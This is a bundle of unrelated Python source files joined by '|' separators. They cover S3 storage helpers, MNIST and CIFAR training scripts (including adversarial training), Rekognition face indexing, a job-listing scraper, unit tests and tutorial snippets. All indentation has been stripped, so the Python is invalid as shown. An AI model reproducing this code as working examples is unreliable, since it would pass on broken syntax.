region_name=os.getenv("TIMONE_STORAGE_S3_REGION"),
aws_access_key_id=os.getenv("TIMONE_STORAGE_S3_KEY"),
aws_secret_access_key=os.getenv("TIMONE_STORAGE_S3_SECRET"),
)
def object_exists(self, org, repo, oid):
try:
uri = str(self.get_object_uri(org, repo, oid))
obj_list = self.client.list_objects_v2(
Bucket=os.getenv("TIMONE_STORAGE_S3_BUCKET"), Prefix=uri
)
for obj in obj_list.get("Contents", []):
if obj["Key"] == uri:
return True
except ClientError as ex:
raise StorageException(org, repo, oid, "object_exists", str(ex))
return False
def get_object_upload_url(self, org, repo, oid):
try:
url = self.client.generate_presigned_url(
"put_object",
Params={
"Bucket": os.getenv("TIMONE_STORAGE_S3_BUCKET"),
"Key": str(self.get_object_uri(org, repo, oid)),
},
ExpiresIn=int(
os.getenv(
"TIMONE_OBJECT_EXPIRESIN", timone.DEFAULT_OBJECT_EXPIRESIN
)
),
)
return url
except ClientError as ex:
raise StorageException(org, repo, oid, "get_object_upload_url", str(ex))
def get_object_download_url(self, org, repo, oid):
try:
url = self.client.generate_presigned_url(
"get_object",
Params={
"Bucket": os.getenv("TIMONE_STORAGE_S3_BUCKET"),
"Key": str(self.get_object_uri(org, repo, oid)),
},
ExpiresIn=int(
os.getenv(
"TIMONE_OBJECT_EXPIRESIN", timone.DEFAULT_OBJECT_EXPIRESIN
)
),
)
return url
except ClientError as ex:
raise StorageException(org, repo, oid, "get_object_download_url", str(ex))
|
# Random Forest Classifier
import sys
import numpy as np
import pickle
from sklearn import model_selection
from sklearn.ensemble import RandomForestClassifier
from sklearn.metrics import accuracy_score, confusion_matrix
from MNIST_Dataset_Loader.mnist_loader import MNIST
import matplotlib.pyplot as plt
from matplotlib import style
style.use('ggplot')
old_stdout = sys.stdout
log_file = open("summary.log","w")
sys.stdout = log_file
print('\nLoading MNIST Data...')
# data = MNIST('./python-mnist/data/')
data = MNIST('./MNIST_Dataset_Loader/dataset/')
print('\nLoading Training Data...')
img_train, labels_train = data.load_training()
train_img = np.array(img_train)
train_labels = np.array(labels_train)
print('\nLoading Testing Data...')
img_test, labels_test = data.load_testing()
test_img = np.array(img_test)
test_labels = np.array(labels_test)
#Features
X = train_img
#Labels
y = train_labels
print('\nPreparing Classifier Training and Validation Data...')
X_train, X_test, y_train, y_test = model_selection.train_test_split(X,y,test_size=0.1)
print('\nRandom Forest Classifier with n_estimators = 100, n_jobs = 10')
print('\nPickling the Classifier for Future Use...')
clf = RandomForestClassifier(n_estimators=100, n_jobs=10)
clf.fit(X_train,y_train)
with open('MNIST_RFC.pickle','wb') as f:
pickle.dump(clf, f)
pickle_in = open('MNIST_RFC.pickle','rb')
clf = pickle.load(pickle_in)
print('\nCalculating Accuracy of trained Classifier...')
confidence = clf.score(X_test,y_test)
print('\nMaking Predictions on Validation Data...')
y_pred = clf.predict(X_test)
print('\nCalculating Accuracy of Predictions...')
accuracy = accuracy_score(y_test, y_pred)
print('\nCreating Confusion Matrix...')
conf_mat = confusion_matrix(y_test,y_pred)
print('\nRFC Trained Classifier Confidence: ',confidence)
print('\nPredicted Values: ',y_pred)
print('\nAccuracy of Classifier on Validation Image Data: ',accuracy)
print('\nConfusion Matrix: \n',conf_mat)
# Plot Confusion Matrix Data as a Matrix
plt.matshow(conf_mat)
plt.title('Confusion Matrix for Validation Data')
plt.colorbar()
plt.ylabel('True label')
plt.xlabel('Predicted label')
plt.show()
print('\nMaking Predictions on Test Input Images...')
test_labels_pred = clf.predict(test_img)
print('\nCalculating Accuracy of Trained Classifier on Test Data... ')
acc = accuracy_score(test_labels,test_labels_pred)
print('\n Creating Confusion Matrix for Test Data...')
conf_mat_test = confusion_matrix(test_labels,test_labels_pred)
print('\nPredicted Labels for Test Images: ',test_labels_pred)
print('\nAccuracy of Classifier on Test Images: ',acc)
print('\nConfusion Matrix for Test Data: \n',conf_mat_test)
# Plot Confusion Matrix for Test Data
plt.matshow(conf_mat_test)
plt.title('Confusion Matrix for Test Data')
plt.colorbar()
plt.ylabel('True label')
plt.xlabel('Predicted label')
plt.axis('off')
plt.show()
sys.stdout = old_stdout
log_file.close()
# Show the Test Images with Original and Predicted Labels
a = np.random.randint(1,30,10)
for i in a:
two_d = (np.reshape(test_img[i], (28, 28)) * 255).astype(np.uint8)
plt.title('Original Label: {0} Predicted Label: {1}'.format(test_labels[i],test_labels_pred[i]))
plt.imshow(two_d, interpolation='nearest',cmap='gray')
plt.show()
#------------------------- EOC -----------------------------
|
# https://docs.aws.amazon.com/rekognition/latest/dg/API_IndexFaces.html
import boto3
#BUCKET = "amazon-rekognition"
BUCKET = "smart-door-image-store"
KEY = "ted_pic.jpg" # Either key in S3 or however img frame gets passed from KVS
IMAGE_ID = KEY
COLLECTION = "faces"
REGION = "us-east-1"
# Collection is already created, but if it wasn't we can uncomment
# this to create it:
# rekognition.create_collection(CollectionId=COLLECTION)
def index_faces(bucket, key, collection_id, image_id=None, attributes=(), region=REGION):
rekognition = boto3.client("rekognition", region)
response = rekognition.index_faces(
Image={
"S3Object": {
"Bucket": bucket,
"Name": key,
}
},
CollectionId=collection_id,
ExternalImageId=image_id,
DetectionAttributes=attributes,
)
return response['FaceRecords']
for record in index_faces(BUCKET, KEY, COLLECTION, IMAGE_ID):
face = record['Face']
#print(face)
# details = record['FaceDetail']
print("Face ({}%)".format(face['Confidence']))
print(" FaceId: {}".format(face['FaceId']))
print(" ImageId: {}".format(face['ImageId']))
"""
Expected output:
Face (99.945602417%)
FaceId: dc090f86-48a4-5f09-905f-44e97fb1d455
ImageId: f974c8d3-7519-5796-a08d-b96e0f2fc242
"""
|
#!/usr/bin/env python
# coding: utf-8
import os
import pathlib
from io import StringIO
from unittest import TestCase
from sampan.toto import get_samples
class TestToto(TestCase):
TEST_CSV_FILE = os.path.join(str(pathlib.Path(__file__).parent), 'resources', 'test.csv')
def test_get_samples(self):
get_samples(self.TEST_CSV_FILE)
|
import _lib
import re
import time
def StartNodeInteractive(datadir, address, port,comment = ""):
_lib.StartTest("Start node (debug) "+comment)
res = _lib.ExecuteHangNode(['startintnode','-datadir',datadir,'-port',port,'-minter',address],datadir)
_lib.FatalAssertSubstr(res,"Process started","No process start marker")
def GetWallets(datadir):
_lib.StartTest("Get node wallets")
res = _lib.ExecuteNode(['listaddresses','-datadir',datadir])
_lib.FatalAssertSubstr(res,"Wallets (addresses)","No list of wallets")
regex = ur"(1[a-zA-Z0-9]{30,100})"
addresses = re.findall(regex, res)
return addresses
def NodeState(datadir):
_lib.StartTest("Check node state")
res = _lib.ExecuteNode(['nodestate','-datadir',datadir])
_lib.FatalAssertSubstr(res,"Number of blocks","No info about blocks")
state = {}
match = re.search( r'Number of blocks - (\d+)', res)
if not match:
_lib.Fatal("Number of blocks is not found "+res)
state['blocks'] = match.group(1)
match = re.search( r'Number of unapproved transactions - (\d+)', res)
if not match:
_lib.Fatal("Numberof unapproved transactions not found "+res)
state['unapproved'] = match.group(1)
match = re.search( r'Number of unspent transactions outputs - (\d+)', res)
if not match:
_lib.Fatal("Number of unspent transactions outputs - not found "+res)
state['unspent'] = match.group(1)
state['inprogress'] = False
match = re.search( r'Loaded (\d+) of (\d+) blocks', res)
if match:
state['totalnumber'] = match.group(2)
state['inprogress'] = True
return state
def WaitBlocksInState(datadir, explen, maxtime = 10):
i = 0
while True:
state = NodeState(datadir)
if int(state['blocks']) >= explen or i >= maxtime:
break
time.sleep(1)
i = i + 1
return state
|
from chatbot.models import Survey
def test_database(test_session):
"""Tests that the mock database was set up correctly"""
# execute
surveys = test_session.query(Survey).all()
# validation
assert len(surveys) == 2
for survey in surveys:
assert survey.name in ["survey1", "survey2"]
assert len(survey.responses) == 2
assert survey.questions.count() == 3 # needs count() b/c dynamic load
assert survey.created_date is not None
|
v = [9, 8, 7, 12, 0, 13, 21]
p = []
i = []
for x in v:
if x % 2 == 0:
p.append(x)
else:
i.append(x)
print(f'Números pares: {p}')
print(f'Números ímpares: {i}')
|
import numpy as np
import tensorflow as tf
from gtrain import FCNet, gtrain
from gtrain.data import AllData
np.random.seed(555)
tf.set_random_seed(555)
def generate_test_data(num_of_train_samples=1000, num_of_validation_samples=100):
data_tr = np.random.rand(num_of_train_samples, 2)
data_val = np.random.rand(num_of_validation_samples, 2)
l_tr = np.zeros([num_of_train_samples, 3])
l_val = np.zeros([num_of_validation_samples, 3])
def sample_class(sample):
if (sample[0] * sample[0] + sample[1] * sample[1]) < 0.0:
return 0
else:
if sample[1] > 0.5:
return 1
else:
return 2
for i in range(len(l_tr)):
l_tr[i][sample_class(data_tr[i])] = 1
for i in range(len(l_val)):
l_val[i][sample_class(data_val[i])] = 1
return data_tr, l_tr, data_val, l_val
layer_input_sizes = 2
num_of_samples = 1000
num_of_classes = 3
data_tr, l_tr, data_val, l_val = generate_test_data(num_of_samples, num_of_classes)
# initialization of weights
inner_dimensions = [layer_input_sizes, 3, num_of_classes]
train_net = FCNet(inner_dimensions, use_cross_entropy=False)
data = AllData(data_tr, l_tr, data_val, l_val)
gtrain(train_net, data, num_steps=10000, evaluate_every=1000, checkpoint_every=1000, num_checkpoints=5)
|
# create a class and __init__
class Book():
pass
book = Book()
print(book) # we get <__main__.Book object at 0x7fe3b9636a60>
# When we say Book() we are instantiating a new object
# This object iws assigned to the book variable
# Printing it gives us the type and memory location
# second method:
print(type(book)) # we get <class '__main__.Book'>
# Then...
class Book():
def __init__(self, title):
self.title = title
# consider this the constructor, or the function that is invoked when we create a book.
# self refers to the book being created
# and we don't have to worry about passing that, it's implicit...
# Title is passed in as an argument, and assigned to self.title (the title of the book)
# methods
class Book():
def __init__ (self, title, pages):
self.title = title
self.pages = pages
def log(self):
print(f"{self.title} is {self.pages} pages long.")
def is_short(self):
if self.pages < 100:
return True
book = Book("are you my mother", 72)
book.log()
# prints out: are you my mother is 72 pages long.
# class level variables
# self refers to the object things are being invoked on,
# When we create an object. __init__ assigns stuff to self
# That allows each object to have attributes.
class Book():
favs = [] # class
def __init__ (self, title, pages):
self.title = title
self.pages = pages
def log(self):
print(f"{self.title} is {self.pages} pages long.")
def is_short(self):
if self.pages < 100:
return True
book = Book("are you my mother?", 72) # title and number of pages
book2 = Book("The Digging-est Dog", 72)
Book.favs.append(book) # add books to the list
Book.favs.append(book2)
print(Book.favs)
#To save save space we are combing the code for all three of these sections.
class Book():
favs = [] # class
def __init__(self, title, pages):
self.title = title
self.pages = pages
def is_short(self):
if self.pages < 100:
return true
#What happens when you pass object to print?
def __str__(self):
return f"{self.title}, {self.pages} pages long"
#What happens when you use ==?
def __eq__(self, other):
if(self.title == other.title and self.pages == other.pages):
return True
#It's approriate to give something for __hash__ when you override __eq__
# #This is the recommended way if mutable (like it is here):
__hash__ = None
#If should immutable, you could do something like this.
#This replaces __hash__ = None
def __hash__(self):
# xor with hash of attributes
return hash(self.title) ^ hash(self.pages)
#from Mastering Object-Oriented Python
book = Book("Are You My Mother", 72)
print(book)
equal_book = Book("Are You My Mother", 72)
print("Are they considered equal?", book == equal_book) # yep
print("Are they the same object?", book is equal_book) # nope
book2 = Book("The Digging-est Dog", 72)
print(hash(book), hash(book2))
print("old hash", hash(book))
book.title = "new"
print("new hash", hash(book)) # BAD!!!
#Hashes shouldn't change
|
from bs4 import BeautifulSoup
import sys
from prep.helpers import HttpHelpers
class iJobs:
def __init__(self, url):
self.url = url
self.helpers = HttpHelpers()
def get(self):
page = self.helpers.download_page(self.url)
if page is None:
sys.exit('Error downloading webpage')
indeed_jobs = self.__parse_index(page)
return indeed_jobs
def __parse_index(self, htmlcontent):
soup = BeautifulSoup(htmlcontent, 'lxml')
jobs_container = soup.find(id='resultsCol')
job_items = jobs_container.find_all('div', class_='jobsearch-SerpJobCard')
if job_items is None or len(job_items) == 0:
return []
all_jobs = []
for job_elem in job_items:
url_elem = job_elem.find('a', class_='jobtitle')
title_elem = job_elem.find('a', class_='jobtitle')
company_elem = job_elem.find('span', class_='company')
loc_elem = job_elem.find('span', class_='location')
if None in (title_elem, company_elem, url_elem, loc_elem):
continue
href = url_elem.get('href')
if href is None:
continue
item = {
"title" : title_elem.text.strip(),
"company" : company_elem.text.strip(),
"location" : loc_elem.text.strip(),
"href" : f'https://www.indeed.com{href}'
}
all_jobs.append(item)
return all_jobs
|
from rest_framework import status
from rest_framework.response import Response
from rest_framework.generics import GenericAPIView
from ..permissions import IsAuthenticated
from ..utils import readbuffer, decrypt_with_db_secret
from ..app_settings import (
ReadHistorySerializer
)
from ..authentication import TokenAuthentication
class HistoryView(GenericAPIView):
authentication_classes = (TokenAuthentication, )
permission_classes = (IsAuthenticated,)
allowed_methods = ('GET', 'OPTIONS', 'HEAD')
def get(self, request, secret_history_id, *args, **kwargs):
"""
Returns a specific history item
Necessary Rights:
- read on secret
:param request:
:type request:
:param secret_id:
:type secret_id:
:param args:
:type args:
:param kwargs:
:type kwargs:
:return: 200 / 400
:rtype:
"""
serializer = ReadHistorySerializer(data=request.data, context=self.get_serializer_context())
if not serializer.is_valid():
return Response(
serializer.errors, status=status.HTTP_400_BAD_REQUEST
)
secret_history = serializer.validated_data.get('secret_history')
try:
callback_pass = decrypt_with_db_secret(secret_history.callback_pass)
except:
callback_pass = '' #nosec -- not [B105:hardcoded_password_string]
return Response({
'create_date': secret_history.create_date,
'write_date': secret_history.write_date,
'data': readbuffer(secret_history.data),
'data_nonce': secret_history.data_nonce if secret_history.data_nonce else '',
'type': secret_history.type,
'callback_url': secret_history.callback_url,
'callback_user': secret_history.callback_user,
'callback_pass': callback_pass,
}, status=status.HTTP_200_OK)
def put(self, *args, **kwargs):
return Response({}, status=status.HTTP_405_METHOD_NOT_ALLOWED)
def post(self, *args, **kwargs):
return Response({}, status=status.HTTP_405_METHOD_NOT_ALLOWED)
def delete(self, *args, **kwargs):
return Response({}, status=status.HTTP_405_METHOD_NOT_ALLOWED)
|
#单一路径图片文件夹生成训练文件
#
import numpy as np
import os
import random
from sklearn.model_selection import train_test_split
from matplotlib import pyplot as plt
import pickle
import cv2
train_X = []
train_y = []
# set folder path
'''
这样做的好处是不需要手动将文件夹分为train、val,符合实际工程
'''
folder_path1 = '/home/yao/data/hymenoptera_data/ants/'
folder_path2= '/home/yao/data/hymenoptera_data/bees/'
classes = ['ant','bee']
#额外设置,如限制尺寸,小于一定尺寸的只放在测试集中
min_size = 224
test_X = []
test_y = []
def cv2_load(path):
img = cv2.imdecode(np.fromfile(path,np.uint8),cv2.IMREAD_COLOR)
shape = img.shape
return img, shape
# load image arrays
for filename in os.listdir(folder_path1):
if filename != '.DS_Store': # nouseful file in mac os
new_file_name = filename.replace(" ", "_")
new_file_name = new_file_name.replace("(", "(")
new_file_name = new_file_name.replace(")", "")
imagepath = folder_path1 + filename
new_imagepath = folder_path1 + new_file_name
if (new_file_name != filename):
os.rename(imagepath, new_imagepath)
print(f'rename {imagepath} as {new_imagepath}')
_,shape = cv2_load(new_imagepath)
if shape[0] <min_size or shape[1]<min_size:
test_X.append(new_imagepath)
test_y.append(0)
else:
train_X.append(new_imagepath)
train_y.append(0)
else:
print(filename, 'not a pic')
# load image arrays
for filename in os.listdir(folder_path2):
if filename != '.DS_Store': #DS_Store是Mac OS保存文件夹的自定义属性的隐藏文件
new_file_name = filename.replace(" ", "_")
new_file_name = new_file_name.replace("(", "(")
new_file_name = new_file_name.replace(")", ")")
imagepath = folder_path2 + filename
new_imagepath = folder_path2 + new_file_name
if (new_file_name != filename):
os.rename(imagepath, new_imagepath)
_,shape = cv2_load(new_imagepath)
if shape[0] <min_size or shape[1]<min_size:
test_X.append(new_imagepath)
test_y.append(1)
else:
train_X.append(new_imagepath)
train_y.append(1)
else:
print(filename, 'not a pic')
print('small size pic:', len(test_X))
X_train, X_test, y_train, y_test = train_test_split(train_X, train_y, test_size=0.3)
X_test.extend(test_X)
y_test.extend(test_y)
#移动
'''
cnt_label = [0,0]
for i in range(classes.__sizeof__()):
cnt_label[i]= np.sum(i == test_y)
for cnt ,i in enumerate(cnt_label,0):
pass
'''
count = len(X_train)
cls_train_cnt =np.array([0,0])
cls_test_cnt =np.array([0,0])
f = open('train.csv', 'w')
for i in range(count):
line = '%s,%d' % (X_train[i], y_train[i]) # %s %d'表示格式,%号分隔,它代表了格式化操作
cls_train_cnt[ y_train[i]] +=1
f.write(line)
if (i < count - 1):
f.write("\n")
f.close()
print('X_train: ', len(X_train))
print(' ant: ',cls_train_cnt[0])
print(' bee: ',cls_train_cnt[1])
print('Gen train.csv Done!')
count = len(X_test)
f = open('val.csv', 'w')
for i in range(count):
line = '%s,%d' % (X_test[i], y_test[i])
cls_test_cnt[ y_test[i]] +=1
f.write(line)
if (i < count - 1):
f.write("\n")
f.close()
print('X_test: ', len(X_test))
print(' ant: ',cls_test_cnt[0])
print(' bee: ',cls_test_cnt[1])
print('Gen val.csv Done!')
|
import pandas as pd
from faker.factory import Factory
from stop_watch import stop_watch # 実行時間測定
# import json # To create a json file
from random import randint # For id
Faker = Factory.create
fake = Faker()
fake.seed(20000) # 設定することで結果が固定される。
fake = Faker("ja_JP")
@stop_watch
def make_data(use_columns, row_count):
return fake.csv(
header=None, data_columns=use_columns, num_rows=row_count, include_row_ids=False
)
def input_data(x):
test_data = {}
for i in range(0, x):
test_data[i] = {}
test_data[i]["id"] = randint(1, 100)
test_data[i]["name"] = fake.name()
test_data[i]["zipcode"] = fake.zipcode()
test_data[i]["address"] = fake.address()
test_data[i]["phone_number"] = fake.phone_number()
return pd.DataFrame(test_data).T # 転置して返却する
def main():
# Enter number of records
number_of_records = 10 # For the above task make this 100
use_columns = ["{{name}}", "{{zipcode}}", "{{address}}", "{{phone_number}}"]
# print(make_data(use_columns, number_of_records))
df = input_data(number_of_records)
print(df.head(10))
print(df.dtypes)
print(df["address"])
s = pd.Series(df["id"], dtype="uint8")
print(s.head(10))
print(s.dtypes)
main()
# The folder or location where this python code
# is save there a students.json will be created
# having 10 students data.
|
from .light_frontend import LightFrontend
from .full_frontend import FullFrontend
from .hybrid_frontend import HybridFrontend
from .composite_frontend import CompositeFrontend
from .replacement_frontend import ReplacementFrontend
|
from __future__ import print_function
import os
import argparse
import torch
import torch.nn as nn
import torch.nn.functional as F
import torchvision
import torch.optim as optim
from torchvision import datasets, transforms
from models.wideresnet import *
from models.resnet import *
from adv import adv_loss_new
parser = argparse.ArgumentParser(description='PyTorch CIFAR TRADES Adversarial Training')
parser.add_argument('--batch-size', type=int, default=128, metavar='N',
help='input batch size for training (default: 128)')
parser.add_argument('--test-batch-size', type=int, default=128, metavar='N',
help='input batch size for testing (default: 128)')
parser.add_argument('--epochs', type=int, default=76, metavar='N',
help='number of epochs to train')
parser.add_argument('--weight-decay', '--wd', default=2e-4,
type=float, metavar='W')
parser.add_argument('--lr', type=float, default=0.1, metavar='LR',
help='learning rate')
parser.add_argument('--momentum', type=float, default=0.9, metavar='M',
help='SGD momentum')
parser.add_argument('--no-cuda', action='store_true', default=False,
help='disables CUDA training')
parser.add_argument('--epsilon', default=0.031,
help='perturbation')
parser.add_argument('--num-steps', default=10,
help='perturb number of steps')
parser.add_argument('--step-size', default=0.007,
help='perturb step size')
parser.add_argument('--beta', default=1.0,
help='regularization, i.e., 1/lambda in TRADES')
parser.add_argument('--seed', type=int, default=1, metavar='S',
help='random seed (default: 1)')
parser.add_argument('--log-interval', type=int, default=100, metavar='N',
help='how many batches to wait before logging training status')
parser.add_argument('--model-dir', default='./model-cifar-wideResNet',
help='directory of model for saving checkpoint')
parser.add_argument('--save-freq', '-s', default=1, type=int, metavar='N',
help='save frequency')
parser.add_argument('--prob','-p', default=1, type=float)
args = parser.parse_args()
# settings
model_dir = args.model_dir
if not os.path.exists(model_dir):
os.makedirs(model_dir)
use_cuda = not args.no_cuda and torch.cuda.is_available()
torch.manual_seed(args.seed)
device = torch.device("cuda" if use_cuda else "cpu")
kwargs = {'num_workers': 1, 'pin_memory': True} if use_cuda else {}
# setup data loader
transform_train = transforms.Compose([
transforms.RandomCrop(32, padding=4),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
])
transform_test = transforms.Compose([
transforms.ToTensor(),
])
trainset = torchvision.datasets.CIFAR10(root='../data', train=True, download=True, transform=transform_train)
train_loader = torch.utils.data.DataLoader(trainset, batch_size=args.batch_size, shuffle=False, **kwargs)
testset = torchvision.datasets.CIFAR10(root='../data', train=False, download=True, transform=transform_test)
test_loader = torch.utils.data.DataLoader(testset, batch_size=args.test_batch_size, shuffle=False, **kwargs)
def train(args, model, device, train_loader, optimizer, epoch, x_advs, perturb_prob):
model.train()
new_x_advs = []
for batch_idx, (data, target) in enumerate(train_loader):
data, target = data.to(device), target.to(device)
idx = torch.nonzero(torch.rand(data.shape[0], device=device)[:, None] < perturb_prob)[:, 0]
data = data.index_select(0, idx)
target = target.index_select(0, idx)
optimizer.zero_grad()
# calculate robust loss
loss, x_adv = adv_loss_new(model=model,
x_natural=data,
y=target,
optimizer=optimizer,
step_size=args.step_size,
epsilon=args.epsilon,
perturb_steps=args.num_steps,
beta=args.beta)
loss.backward()
optimizer.step()
new_x_adv = x_advs[batch_idx]
new_x_adv[idx] = x_adv
new_x_advs.append(new_x_adv)
# print progress
if batch_idx % args.log_interval == 0:
print('Train Epoch: {} [{}/{} ({:.0f}%)]\tLoss: {:.6f}'.format(
epoch, batch_idx * len(data), len(train_loader.dataset),
100. * batch_idx / len(train_loader), loss.item()))
return new_x_advs
def eval_train(model, device, train_loader):
model.eval()
train_loss = 0
correct = 0
with torch.no_grad():
for data, target in train_loader:
data, target = data.to(device), target.to(device)
output = model(data)
train_loss += F.cross_entropy(output, target, size_average=False).item()
pred = output.max(1, keepdim=True)[1]
correct += pred.eq(target.view_as(pred)).sum().item()
train_loss /= len(train_loader.dataset)
print('Training: Average loss: {:.4f}, Accuracy: {}/{} ({:.0f}%)'.format(
train_loss, correct, len(train_loader.dataset),
100. * correct / len(train_loader.dataset)))
training_accuracy = correct / len(train_loader.dataset)
return train_loss, training_accuracy
def eval_test(model, device, test_loader):
model.eval()
test_loss = 0
correct = 0
with torch.no_grad():
for data, target in test_loader:
data, target = data.to(device), target.to(device)
output = model(data)
test_loss += F.cross_entropy(output, target, size_average=False).item()
pred = output.max(1, keepdim=True)[1]
correct += pred.eq(target.view_as(pred)).sum().item()
test_loss /= len(test_loader.dataset)
print('Test: Average loss: {:.4f}, Accuracy: {}/{} ({:.0f}%)'.format(
test_loss, correct, len(test_loader.dataset),
100. * correct / len(test_loader.dataset)))
test_accuracy = correct / len(test_loader.dataset)
return test_loss, test_accuracy
def adjust_learning_rate(optimizer, epoch):
"""decrease the learning rate"""
lr = args.lr
if epoch >= 75:
lr = args.lr * 0.1
if epoch >= 90:
lr = args.lr * 0.01
if epoch >= 100:
lr = args.lr * 0.001
for param_group in optimizer.param_groups:
param_group['lr'] = lr
def main():
# init model, ResNet18() can be also used here for training
model = WideResNet().to(device)
optimizer = optim.SGD(model.parameters(), lr=args.lr, momentum=args.momentum, weight_decay=args.weight_decay)
x_advs = []
for epoch in range(1, args.epochs + 1):
# adjust learning rate for SGD
adjust_learning_rate(optimizer, epoch)
# adversarial training
x_advs = train(args, model, device, train_loader, optimizer, epoch, x_advs, perturb_prob=0.25)
# evaluation on natural examples
print('================================================================')
eval_train(model, device, train_loader)
eval_test(model, device, test_loader)
print('================================================================')
# save checkpoint
if epoch % args.save_freq == 0:
torch.save(model.state_dict(),
os.path.join(model_dir, 'model-wideres-epoch{}.pt'.format(epoch)))
torch.save(optimizer.state_dict(),
os.path.join(model_dir, 'opt-wideres-checkpoint_epoch{}.tar'.format(epoch)))
if __name__ == '__main__':
main()
|
# day 5 Numpy
import numpy as np
def introduction():
print('Numpy Version', np.__version__)
def array_operation():
np.random.seed(0) # seed for reproducibility
x1 = np.random.randint(10, size=6) # One-dimensional array
x2 = np.random.randint(10, size=(3, 4)) # Two-dimensional array
x3 = np.random.randint(10, size=(3, 4, 5)) # Three-dimensional array
print("x3 ndim: ", x3.ndim)
print("x3 shape:", x3.shape)
print("x3 size: ", x3.size)
print("dtype:", x3.dtype)
print("itemsize:", x3.itemsize, "bytes")
print("nbytes:", x3.nbytes, "bytes")
print('X1', x1)
print('x1[0]', x1[0])
print('x1[-1]', x1[-1])
print('x2', x2)
print('x2[0,0]', x2[0, 0])
print('x2[1,-1]', x2[1, -1])
x2[0, 0] = 12
print('x2', x2)
def array_sub():
x = np.arange(10)
print('x', x)
print('x[:5]', x[:5])
print('x[5:]', x[5:])
print('x[3:5]', x[3:5])
print('x[::2]', x[::2])
print('x[1::2]', x[1::2])
print('x[::-1]', x[::-1])
print('x[5::-2]', x[5::-2])
x2 = np.random.randint(10, size=(3, 4))
print('x2', x2)
print('x2[:2, :3]', x2[:2, :3]) # 2x3
print('x2[:3, ::2]', x2[:3, ::2])
print('x2[::-1, ::-1]', x2[::-1, ::-1])
print('x2[:, 0]', x2[:, 0]) # first column of x2
print('x2[0, :]', x2[0, :]) # first row of x2
print(x2[0], x2[0]) # equivalent to x2[0, :]
x2_sub = x2[:2, :2]
print('sub, x2[0, :]', x2_sub)
x2_sub[0, 0] = 99
print(x2_sub)
print('x2', x2) # Sub arrays as no-copy views
x2_sub_copy = x2[:2, :2].copy() # Creating copies of arrays
print(x2_sub_copy)
def array_reshape():
x = np.array([1, 2, 3])
print('x', x)
reshape1 = x.reshape(1, 3)
reshape2 = x[np.newaxis, :]
reshape3 = x.reshape(3, 1)
reshape4 = x[:, np.newaxis]
print('reshape', reshape1)
print('newaxis', reshape2)
print('reshape', reshape3)
print('newaxis', reshape4)
x[2] = 999
print('reshape', reshape1)
print('newaxis', reshape2)
print('reshape', reshape3)
print('newaxis', reshape4)
def concat_split():
x = np.array([1, 2, 3])
y = np.array([3, 2, 1])
con1 = np.concatenate([x, y])
print('concatenate([x,y])', con1)
z = np.array([99, 99, 99])
con2 = np.concatenate([x, y, z])
print('concatenate([x, y, z])', con2)
grid = np.array([[1, 2, 3],
[4, 5, 6]])
con3 = np.concatenate([grid, grid])
print('2 dims concatenate([x, y])', con3)
con4 = np.concatenate([grid, grid], axis=1)
print('2 dims concatenate([x, y,axis=1])', con4)
x = np.array([9, 9, 9])
grid = np.array([[1, 1, 1],
[1, 1, 1]])
con5 = np.vstack([x, grid])
print('mix dims vstack([x, y])', con5)
y = np.array([[99],
[99]])
con6 = np.hstack([grid, y])
print('mix dims hstack([x, y])', con6)
x = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
x1, x2, x3 = np.split(x, [1, 2])
print('split', x1, x2, x3)
grid = np.arange(16).reshape((4, 4))
print('2dim split', x1, x2)
up, down = np.vsplit(grid, [2])
print(up)
print(down)
left, right = np.hsplit(grid, [2])
print(left)
print(right)
if __name__ == '__main__':
# introduction()
# array_operation()
# array_reshape()
concat_split()
|
# -*- coding: utf-8 -*-
"""
@date: 2021/2/23 下午8:22
@file: fashionmnist.py
@author: zj
@description:
"""
from torch.utils.data import Dataset
import torchvision.datasets as datasets
from zcls.data.datasets.util import default_converter
# from zcls.data.datasets.evaluator.general_evaluator import GeneralEvaluator
from .evaluator.verification_evaluator import VerificationEvaluator
class FashionMNIST(Dataset):
def __init__(self, root, train=True, transform=None, target_transform=None, top_k=(1, 5)):
self.data_set = datasets.FashionMNIST(root, train=train, download=True)
self.targets = self.data_set.targets
self.classes = self.data_set.classes
self.root = root
self.transform = transform
self.target_transform = target_transform
self._update_evaluator(top_k)
def __getitem__(self, index: int):
image, target = self.data_set.__getitem__(index)
image = default_converter(image, rgb=False)
if self.transform is not None:
image = self.transform(image)
if self.target_transform is not None:
target = self.target_transform(target)
return image, target
def __len__(self) -> int:
return self.data_set.__len__()
def _update_evaluator(self, top_k):
# self.evaluator = GeneralEvaluator(self.classes, top_k=top_k)
self.evaluator = VerificationEvaluator()
def __repr__(self):
return self.__class__.__name__ + ' (' + self.root + ')'
|
from bsm.loader import load_common
class Base(object):
def __init__(self, config, env):
self._config = config
self._env = env
class OperationError(Exception):
pass
class Operation(object):
def __init__(self, config, env):
self.__config = config
self.__env = env
def execute(self, op_name, *args, **kargs):
try:
op = load_common(op_name, 'bsm.operation')(self.__config, self.__env)
except Exception as e:
raise OperationError('Can not load operation "{0}": {1}'.format(op_name, e))
return op.execute(*args, **kargs)
|
import sys
import torch
import torch.nn.functional as F
# import utils
class Net(torch.nn.Module):
def __init__(self,inputsize,taskcla, unitN = 400, split = False, notMNIST = False):
super(Net,self).__init__()
ncha,size,_=inputsize
self.notMNIST = notMNIST
if notMNIST:
unitN = 150
self.taskcla=taskcla
self.split = split
self.relu=torch.nn.ReLU()
self.drop=torch.nn.Dropout(0.5)
self.fc1=torch.nn.Linear(ncha*size*size,unitN)
self.fc2=torch.nn.Linear(unitN,unitN)
if notMNIST:
self.fc3=torch.nn.Linear(unitN,unitN)
self.fc4=torch.nn.Linear(unitN,unitN)
if split:
self.last=torch.nn.ModuleList()
for t,n in self.taskcla:
self.last.append(torch.nn.Linear(unitN,n))
else:
self.fc3=torch.nn.Linear(unitN,taskcla[0][1])
def forward(self,x):
h=x.view(x.size(0),-1)
h=self.drop(F.relu(self.fc1(h)))
h=self.drop(F.relu(self.fc2(h)))
if self.notMNIST:
h=self.drop(F.relu(self.fc3(h)))
h=self.drop(F.relu(self.fc4(h)))
if self.split:
y = []
for t,i in self.taskcla:
y.append(self.last[t](h))
else:
y = self.fc3(h)
return y
# import sys
# import torch
# import torch.nn.functional as F
# # import utils
# class Net(torch.nn.Module):
# def __init__(self,inputsize,taskcla, unitN = 400, split = False, notMNIST = False):
# super(Net,self).__init__()
# ncha,size,_=inputsize
# self.taskcla=taskcla
# self.split = split
# self.relu=torch.nn.ReLU()
# self.drop=torch.nn.Dropout(0.5)
# self.fc1=torch.nn.Linear(ncha*size*size,unitN)
